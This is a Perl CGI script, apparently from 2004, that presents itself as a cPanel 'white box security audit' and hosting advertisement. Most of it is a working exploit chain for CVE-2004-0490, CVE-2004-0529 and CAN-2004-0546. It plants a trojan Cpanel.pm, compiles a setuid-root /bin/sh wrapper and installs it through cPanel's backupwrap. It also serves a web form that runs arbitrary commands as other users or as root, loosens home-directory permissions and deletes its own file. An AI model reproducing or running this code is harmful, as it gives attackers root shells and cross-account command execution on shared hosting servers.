#!/usr/bin/perl -w # PROGRAM: tests.pl # AUTHORS: Rob Brown (rob@asquad.com) # PURPOSE: Detect possible vulnerabilities # # USAGE: This script MUST be run from a php script # in order for the tests to work correctly. (It # will NOT work to execute this script directly # from the browser because it's written in Perl.) # See a-squad.com/audit for the php wrapper code. # # DISCLAIMER: # THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY*. # IT IS PROVIDED "AS IS" AND WITHOUT ANY WARRANTY. # USE AT YOUR OWN RISK. # # For secure cpanel hosting, visit A-Squad.Com use strict; use CGI ':standard'; if (my $query = shift) { $ENV{QUERY_STRING} = $query; $ENV{REQUEST_METHOD}="GET"; } my $q = new CGI; my @users = (); my $me = ""; my $default_command = "id"; my $dummy = "/tmp/tests"; $| = 1; print start_html("System Check"); my $action = "cpanel.php"; my $secure = 1; my $locked = 1; my $common = 0; my $cpanel = 0; my $canexe = 0; my $cpwrap = 0; print qq{
ADVERTISEMENT: A-Squad Certified Secure cPanel Hosting
\n}; print "
    Performing white box security audit...\n"; if (-d "/usr/local/cpanel") { chomp($cpanel = `/usr/local/cpanel/cpanel -V`); print "
  1. PASSED: cPanel INSTALLED ($cpanel)\n"; } else { print "
  2. FAILED: cPanel NOT INSTALLED\n"; print "Explain\n"; } my $uid = $<; if ($uid < 500) { print "
  3. FAILED: Privileged UID Vulnerability Check ($uid)\n"; print "Explain\n"; } else { print "
  4. PASSED: Privileged UID Vulnerability Check ($uid)\n"; } if (my $nam = getpwuid $uid) { if ($nam eq "nobody") { print "
  5. FAILED: nobody execution\n"; print "Explain\n"; $secure = 0; $common = 1; } else { print "
  6. PASSED: User $nam ($uid) is probably not shared\n"; } } else { print "
  7. FAILED: Privileged UID Vulnerability Check ($uid)\n"; } $ENV{PWD} ||= `pwd`; chomp $ENV{PWD}; setpwent; while (my ($name,$passwd,$uid,$gid, $quota,$comment,$gcos,$dir) = getpwent) { if ($uid >= 500) { push @users, $name; if ($ENV{PWD} =~ m%^\Q$dir\E/%) { $me = $name; $ENV{HOME} = $dir; } } } if ($me && $ENV{HOME} && -d $ENV{HOME}) { my $mode = (stat _)[2]; if ($mode & 1) { print "
  8. FAILED: Stealth Snoop Vulnerability [$ENV{HOME}]\n"; print "Explain\n"; $secure = 0; $locked = 0; } else { print "
  9. PASSED: Stealth Snoop Vulnerability [$ENV{HOME}]\n"; } if ($mode & 4) { print "
  10. FAILED: Simple \$HOME Scanning [$ENV{HOME}]\n"; print "Explain\n"; $secure = 0; } else { print "
  11. PASSED: Simple \$HOME Scanning [$ENV{HOME}]\n"; } if ($mode & 32) { print "
  12. FAILED: Group \$HOME Scanning [$ENV{HOME}]\n"; print "Explain\n"; $secure = 0; } else { print "
  13. PASSED: Group \$HOME Scanning [$ENV{HOME}]\n"; } $mode = (stat "$ENV{HOME}/..")[2]; if ($mode & 4) { print "
  14. FAILED: Root /home scanning\n"; print "Explain\n"; $secure = 0; } else { print "
  15. PASSED: Root /home scanning\n"; } $mode = (stat "$ENV{HOME}/public_html")[2]; if (!$locked && $mode & 1) { print "
  16. FAILED: Simple WEBROOT Protection\n"; print "Explain\n"; } else { print "
  17. PASSED: Simple WEBROOT Protection\n"; } my $pubg = (stat _)[5]; if (($common && !$locked and $(==$pubg && ($mode & 8)) or (!$locked && $mode & 1)) { print "
  18. FAILED: Real WEBROOT Protection\n"; print "Explain\n"; $secure = 0; } else { print "
  19. PASSED: Real WEBROOT Protection\n"; } } else { print "
  20. FAILED: Unable to locate unprivileged homedir\n"; } my $command = $q->param("command") || $default_command; my $who = $q->param("username") || $me; if ($cpanel && $common) { print "
  21. PASSED: CVE-2004-0490 mod_phpsuexec PATH_TRANSLATED Vulnerability Test\n"; if ($command and $who) { my $wraptest = "/usr/local/cpanel/wrap"; $cpwrap = 1 if -x $wraptest && -u _; if ($who eq "root") { print "
  22. SKIPPED: CVE-2004-0529 suEXEC mod_php Taint Vulnerability Test\n"; print "Explain\n"; $canexe = $cpwrap; } else { mkdir $dummy, 0755; chdir $dummy; symlink("/usr/local/cpanel","cpanel"); my $dir = (getpwnam $who)[7]; open (DUMMY,">Cpanel.pm"); $ENV{HOME} = $dir; print DUMMY qq{chdir "$dir";warn "\n";\nexec <&1`; if ($out =~ /^\n/) { print "
  23. FAILED: CVE-2004-0529 suEXEC mod_php Taint Vulnerability Test\n"; print "Explain\n"; print "
    EXEC [$command] as [$who]:\n";
        $out =~ s/&/&/g;
        $out =~ s/\n";
        $canexe = 1;
      } else {
        print "
  24. PASSED: CVE-2004-0529 suEXEC mod_php Taint Vulnerability Test\n";
        print "\n" if $out;
      }
    }

    if ($canexe) {
      if (!$cpwrap) {
        open (DUMMY,">wrap.c");
        print DUMMY qq{int main() { initgroups("root",0);setgid(0);setuid(0);execl("/bin/sh","sh",0); }\n};
        close DUMMY;
        if (my $cc = `cc -o wrap wrap.c 2>&1`) {
          print "\n";
        } else {
          open (DUMMY,">SafeFile.pm");
          print DUMMY qq{exec q{ cd /usr/local/cpanel;mv bin bin.ROOT;mkdir bin;echo 'install -o root -g wheel -m 04777 $dummy/wrap .' > bin/backupadmin;chmod 755 bin/backupadmin;bin.ROOT/backupwrap;rm bin/backupadmin;rmdir bin;mv bin.ROOT bin };\n};
          close DUMMY;
          my $out = `/usr/local/apache/bin/suexec cpanel cpanel cpanel/bin/proftpdvhosts 2>&1`;
        }
      }
      $cpwrap = 1 if -x $wraptest && -u _;
    }
    chdir "/";
    if ($cpwrap) {
      print "
  25. FAILED: CAN-2004-0546 cpwrap suid root Vulnerability Test\n";
      print "Explain\n";
      push @users, "root";
      if ($who eq "root") {
        print "
    EXEC [$command] as [$who]:\n";
        $ENV{EXEC} = $command;
        my $out = `echo \$EXEC | $wraptest 2>&1`;
        $out =~ s/&/&/g;
        $out =~ s/\n";
      }
    } else {
      print "
  26. PASSED: CAN-2004-0546 cpwrap suid root Vulnerability Test\n";
    }
    system("rm","-rf",$dummy);
  }
} elsif ($cpanel && !$common) {
  my $probe = `PATH_TRANSLATED=/usr/local/cpanel/base/phpinfo.php SCRIPT_FILENAME=/dev/null REQUEST_METHOD=GET /usr/bin/php &1`;
  if ($probe =~ /phpinfo\(\)/) {
    print "
  27. FAILED: CVE-2004-0490 mod_phpsuexec PATH_TRANSLATED Vulnerability Test\n";
    print "Explain\n";
    $canexe = 1;
    $secure = 0;
    print "
    EXEC [$command] as [$who]:\n";
    my $out = `$command 2>&1`;
    $out =~ s/&/&/g;
    $out =~ s/\n";
    if ($who ne $me) {
      print "Submit again to switch to another user...
    \n";
      my @guess = qw(/index.php /forum/index.php /forums/index.php);
      my $rand = $guess[rand @guess];
      $action = "/~$who$rand/~$me/cpanel.php";
      system "chmod o+x $ENV{HOME}";
    }
  } else {
    print "
  28. PASSED: CVE-2004-0490 mod_phpsuexec PATH_TRANSLATED Vulnerability Test\n";
  }
  print "
  29. PASSED: CVE-2004-0529 suEXEC mod_php Taint Vulnerability Test\n";
  print "
  30. PASSED: CAN-2004-0546 cpwrap suid root Vulnerability Test\n";
}
if ($cpanel) {
  if ($secure) {
    print "
  31. PASSED: Congratulations, your cPanel configuration is secure!\n";
  } else {
    print "
  32. FAILED: One or more insecure cPanel configurations were detected.  Visit A-Squad.Com for details on where to find more secure cPanel hosting.\n";
  }
}
print "
"; print start_form(-method => "GET",-action => $action,-name=>"f"), "Username: ", popup_menu (-name => "username", -values => [ sort @users ], -default => $who, ), br, "Password: (not required)",br, "Command: ", textfield(-name => "command",-value=> $command), br, submit(-value=> "Test Execution"), end_form, "\n\n" if $canexe; print end_html; -M$0>0.01&&unlink$0;